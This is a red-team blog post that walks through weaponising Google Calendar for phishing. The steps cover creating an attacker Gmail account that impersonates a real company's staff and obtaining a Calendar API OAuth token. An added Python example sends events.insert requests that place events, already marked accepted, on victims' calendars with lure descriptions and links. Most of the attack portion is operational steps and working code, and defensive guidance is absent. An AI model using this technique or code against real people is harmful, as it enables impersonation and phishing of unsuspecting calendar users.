On Halloween, October 31, 2018, Black Hills Information Security researchers Beau Bullock and Michael Felch disclosed to Google, step by step, how anyone with a Gmail account could add an event, already marked as "accepted," to any Google Calendar through the Google Calendar API. Bullock and Felch also published a blog post that explains the attack in detail.
I gave a talk on this topic at the Texas Cyber Summit on Saturday, 10/12/2019, entitled "Gone Calishing: A Red Team Approach to Weaponizing Google Calendar and How to Stop It," where I show exactly how to conduct this attack using my script called G-Calisher. My script is basically the Python version of Bullock and Felch's Invoke-InjectGEventAPI module from their MailSniper PowerShell toolkit.
I have been asked for the slides, but since I will be giving this talk at two other upcoming conferences I decided to write this Medium post instead. In this post I will simply give the step-by-step instructions for conducting this attack using my G-Calisher tool.
Step 1: Create a new Gmail account or log in to your current Gmail account.
This will be your attacker account (the one originating the calendar event), so make it fit your operation. If I'm pretending to be Tom Jones from Carbon Black, for example: email@example.com. Make sure you know the cover company's email address format so the account looks as legitimate as possible.
Step 2: Create or select a project and agree to the Terms of Service
- Create a new project or select one that you already have
- Click "Continue"
- Agree to the Terms of Service in the popup
- Choose your country and click "Agree and Continue"
Step 3: Name your project and click “create”
Step 4: Click “Go to Credentials”
Step 5: On the “Add credentials to your project” page click “cancel”
Step 6: On the left of the page, select the "OAuth consent screen" tab.
Step 7: On the OAuth consent screen, select an email address, enter a product name if one is not already set, and click the Save button.
Step 8: Select the Credentials tab
- Click the "Create credentials" button and select "OAuth client ID".
Step 9: Select the application type "Web application". Under "Authorized redirect URIs":
- paste in the following address: https://developers.google.com/oauthplayground
- Then click the Create button.
Step 10: From the popup, copy your "Client ID" and "Client Secret". Treat these like credentials: anyone holding them can run the same flow against your consent screen.
Step 11: Navigate here: https://developers.google.com/oauthplayground/
- Click the gear in the upper right-hand corner
Step 12: Check the box "Use your own OAuth credentials" (the fields below it are greyed out until you do).
- Enter the OAuth2 client ID and OAuth2 client secret in the boxes.
- Make sure that "OAuth flow" is set to Server-side
- and "Access type" is set to Offline (this is what gets you a refresh token alongside the access token).
- Click Close
Step 13: Back on the left-hand side of the OAuth Playground screen
- Expand the "Calendar API v3" entry
- and click both scope URLs listed there to add them to the requested scopes.
- Click "Authorize APIs"
Step 14: Select the account you want to authorize, then click Allow.
- This is the attacker email address that you just created or logged into. The consent prompt is what ties the token to that account: events inserted with it will show that account as the organizer.
If you get an error such as "Error: redirect_uri_mismatch", the redirect URI you added in Step 9 may not have propagated yet. Wait a few minutes, hit the back button, and try to authorize again.
Step 15: You should now be at "Step 2: Exchange authorization code for tokens."
- Click the "Exchange authorization code for tokens" button.
- The "Access token" is the item we need for accessing the API.
- Copy the value of the "Access token."
- Note that the access token is short-lived; the Playground shows its remaining lifetime in seconds. Because you chose Offline access, you also received a refresh token, and the Playground's refresh button will mint a fresh access token without repeating the authorization. If G-Calisher starts getting 401 responses mid-operation, an expired token is the first thing to check.
That is all of the steps needed to get the API access token used for an API calendar injection.
Now all you need to do is use G-Calisher to send your calendar injection to the email addresses of your victim(s).
First, you will need to clone the G-Calisher GitHub repo:
Then install the Python requests library using pip:
pip install requests
Here is an example from the injection I sent at the Texas Cyber Summit:
I recommend taking a look at the usage statement for the script, which you can read from the terminal or from the GitHub page. It breaks down the mandatory and optional parameters for you. The above screenshot uses all of the mandatory parameters as well as the two optional parameters, "Title" and "Description." I recommend using those two optional parameters so that your event does not look odd on the receiver's end.
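To make the mechanism concrete, here is an added example (mine as editor, not G-Calisher's own code or Bullock and Felch's module) of what the injection amounts to at the API level: a single events.insert call on the attacker account's primary calendar, where each victim is listed as an attendee whose responseStatus is already "accepted" and sendUpdates=all asks Google to deliver the invitation. The function names (build_injection_request, send_injection, attendee_status), the sample start time and the constructed SAMPLE_RESPONSE are assumptions of this example; the endpoint, header and body fields are the documented Calendar API v3 ones. Only send_injection talks to Google, and it needs the requests library and a live token from Step 15.

```python
"""Added example: a Google Calendar events.insert "accepted" injection.
Not the G-Calisher script; function names here are this example's own."""
from datetime import datetime, timedelta

CALENDAR_API = "https://www.googleapis.com/calendar/v3"

# Assumed start time for the demo event (naive; timeZone is supplied separately).
SAMPLE_START = datetime(2019, 10, 12, 14, 0)


def build_injection_request(access_token, victims, title, description, start,
                            duration_minutes=30, location=None,
                            tz="America/Chicago"):
    """Return (url, headers, params, body) for POST calendars/primary/events.

    The attendee entries carry responseStatus "accepted". That field is what
    makes the event land on the victim's calendar as already accepted rather
    than as a pending invitation, which is the behaviour the post describes.
    """
    if isinstance(victims, str):
        victims = [victims]
    if not victims:
        raise ValueError("at least one victim address is required")
    end = start + timedelta(minutes=duration_minutes)
    body = {
        "summary": title,
        "description": description,
        # With timeZone given, dateTime may omit a UTC offset (RFC 3339 local time).
        "start": {"dateTime": start.isoformat(), "timeZone": tz},
        "end": {"dateTime": end.isoformat(), "timeZone": tz},
        "attendees": [{"email": v, "responseStatus": "accepted"} for v in victims],
        "reminders": {"useDefault": True},
    }
    if location:
        body["location"] = location
    url = f"{CALENDAR_API}/calendars/primary/events"
    headers = {
        "Authorization": f"Bearer {access_token}",  # token copied from the Playground
        "Content-Type": "application/json",
    }
    # sendUpdates=all tells Google to email the invitation to every attendee.
    params = {"sendUpdates": "all"}
    return url, headers, params, body


def send_injection(access_token, victims, title, description, start, **kw):
    """POST the request with requests (pip install requests) and return the
    created event. Raises for HTTP errors, e.g. 401 once the token has expired."""
    import requests  # imported lazily so the builder above stays stdlib-only
    url, headers, params, body = build_injection_request(
        access_token, victims, title, description, start, **kw)
    resp = requests.post(url, headers=headers, params=params, json=body, timeout=30)
    resp.raise_for_status()
    return resp.json()


def attendee_status(event, email):
    """Read back the responseStatus Google recorded for one attendee in the
    events.insert response; "accepted" confirms the injection stuck."""
    for attendee in event.get("attendees", []):
        if attendee.get("email", "").lower() == email.lower():
            return attendee.get("responseStatus")
    return None


# Constructed, abbreviated sample of an events.insert response, so the
# read-back check can be exercised offline.
SAMPLE_RESPONSE = {
    "kind": "calendar#event",
    "status": "confirmed",
    "summary": "Quarterly security review",
    "attendees": [
        {"email": "firstname.lastname@example.org", "responseStatus": "accepted"},
    ],
}

if __name__ == "__main__":
    url, headers, params, body = build_injection_request(
        "ya29.PLACEHOLDER", ["firstname.lastname@example.org"],
        "Quarterly security review", "Dial-in details: https://example.com/meet",
        SAMPLE_START)
    print(url, params)
    print(body)
    print(attendee_status(SAMPLE_RESPONSE, "firstname.lastname@example.org"))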
Thanks to everyone who came out to my talk at the Texas Cyber Summit, and thanks for all of the slide requests. I hope that these instructions will hold you over until I am done giving my talks and can post the slides.
I will be speaking at:
- ToorCon 2019 at The Point in Mission Bay, San Diego, CA, 8–10 NOV 2019. https://sandiego.toorcon.net/
- Hackfest 2019 in Quebec City, Canada, 1–2 NOV 2019. https://hackfest.ca/en/
I will post the slides soon.
Much Love… 4n7m4n